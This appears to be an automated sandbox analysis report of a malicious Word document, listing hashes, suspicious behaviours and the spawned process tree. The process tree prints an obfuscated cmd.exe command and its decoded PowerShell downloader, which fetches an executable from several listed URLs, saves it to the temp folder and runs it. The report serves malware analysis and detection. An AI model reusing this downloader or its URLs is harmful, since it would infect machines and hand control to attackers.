Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 05:08
Behavioral task
behavioral1
Sample
5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc
-
Size
88KB
-
MD5
5d556be2d8f7b1ee8cf75c1fdbc3258e
-
SHA1
64a38f77f27e6c43f2c442b292c601713d649252
-
SHA256
f56253a906074b2f40c32b182590049f4aa89644d9904f74021dc6a2333e17be
-
SHA512
aae1f5e0374dc67428dca48a54019a70cb65e843406eaf96530e327de0cf798cf4e7afe4fb5d61672091737c73288e1fee2cf3dd09d5d875e0b526fbf14a5329
-
SSDEEP
768:SJOVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBZ+1oQAb8gLyVvHKyoZXrQ/iJw7o:gOocn1kp59gxBK85fBZ+aQuFDyg0i64/
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4344 2892 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 44 4804 powershell.exe 45 4804 powershell.exe 47 4804 powershell.exe 120 4804 powershell.exe 121 4804 powershell.exe 123 4804 powershell.exe 125 4804 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2892 WINWORD.EXE 2892 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 2464 powershell.exe 2464 powershell.exe 2464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE 2892 WINWORD.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exepowershell.exedescription pid process target process PID 2892 wrote to memory of 4344 2892 WINWORD.EXE cmd.exe PID 2892 wrote to memory of 4344 2892 WINWORD.EXE cmd.exe PID 4344 wrote to memory of 4576 4344 cmd.exe cmd.exe PID 4344 wrote to memory of 4576 4344 cmd.exe cmd.exe PID 4576 wrote to memory of 3068 4576 cmd.exe cmd.exe PID 4576 wrote to memory of 3068 4576 cmd.exe cmd.exe PID 4576 wrote to memory of 2188 4576 cmd.exe cmd.exe PID 4576 wrote to memory of 2188 4576 cmd.exe cmd.exe PID 2188 wrote to memory of 4312 2188 cmd.exe cmd.exe PID 2188 wrote to memory of 4312 2188 cmd.exe cmd.exe PID 2188 wrote to memory of 4804 2188 cmd.exe powershell.exe PID 2188 wrote to memory of 4804 2188 cmd.exe powershell.exe PID 4804 wrote to memory of 2464 4804 powershell.exe powershell.exe PID 4804 wrote to memory of 2464 4804 powershell.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser.DRc$( fI;)(dnes.DRc$;)0,GjU$,'TEG'(nepo.DRc${yrt{)DIk$ ni GjU$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = RTX$;'ptthlmx.2lmxsm' moc- tcejbO-weN= DRc$;)'exe.vZj\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=ZUX$;)'@'(tilpS.'r2XLabAu/ten.kcolnuym//:ptth@gLpdpvh/moc.citamarolf.www//:ptth@gBtLjq99/ri.eltsac-srats//:ptth@4asvsvLN/ta.kcoronarev.www//:ptth@bno8STBJ9/moc.niurtsnocsm//:ptth'=DIk$;'GJS'=vHS$ llehsrewop&&for /L %d in (556,-1,0)do set Vyl=!Vyl!!ZW:~%d,1!&&if %d equ 0 echo !Vyl:*Vyl!=! |FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml')DO %I -"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser.DRc$( fI;)(dnes.DRc$;)0,GjU$,'TEG'(nepo.DRc${yrt{)DIk$ ni GjU$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = RTX$;'ptthlmx.2lmxsm' moc- tcejbO-weN= DRc$;)'exe.vZj\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=ZUX$;)'@'(tilpS.'r2XLabAu/ten.kcolnuym//:ptth@gLpdpvh/moc.citamarolf.www//:ptth@gBtLjq99/ri.eltsac-srats//:ptth@4asvsvLN/ta.kcoronarev.www//:ptth@bno8STBJ9/moc.niurtsnocsm//:ptth'=DIk$;'GJS'=vHS$ llehsrewop&&for /L %d in (556,-1,0)do set Vyl=!Vyl!!ZW:~%d,1!&&if %d equ 0 echo !Vyl:*Vyl!=! |FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml')DO %I -"3⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo powershell $SHv='SJG';$kID='http://msconstruin.com/9JBTS8onb@http://www.veranorock.at/NLvsvsa4@http://stars-castle.ir/99qjLtBg@http://www.floramatic.com/hvpdpLg@http://myunlock.net/uAbaLX2r'.Split('@');$XUZ=([System.IO.Path]::GetTempPath()+'\jZv.exe');$cRD =New-Object -com 'msxml2.xmlhttp';$XTR = New-Object -com 'adodb.stream';foreach($UjG in $kID){try{$cRD.open('GET',$UjG,0);$cRD.send();If ($cRD.responsetext -like '*MZ*') {$XTR.open();$XTR.type = 1;$XTR.write($cRD.responseBody);$XTR.savetofile($XUZ);Start-Process $XUZ;break}}catch{}} "4⤵PID:3068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml') DO %I -"4⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c assoc.ps1xml5⤵PID:4312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =SJG6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82